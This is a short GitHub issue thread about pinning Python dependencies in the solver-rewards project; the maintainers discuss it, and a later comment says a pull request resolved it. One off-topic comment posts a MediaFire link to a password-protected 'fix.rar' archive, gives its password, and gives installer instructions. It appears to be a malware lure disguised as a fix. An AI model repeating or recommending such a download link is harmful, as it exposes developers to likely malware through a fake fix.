### ISSUE TITLE
Systematic approach to dependencies

### ISSUE THREAD

**Issue by fhenneke** [cowprotocol/solver-rewards#392]
We have had multiple issues with new version of packages and the code breaking.

A tool like pip-tools to pin packages might be useful. This opportunity could also be used to consolidate configuration files for some dev tools used into a single pyproject.toml.

**Comment by youngerwarrior** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by bram-vdberg** [comment]
Addressed with PR #393
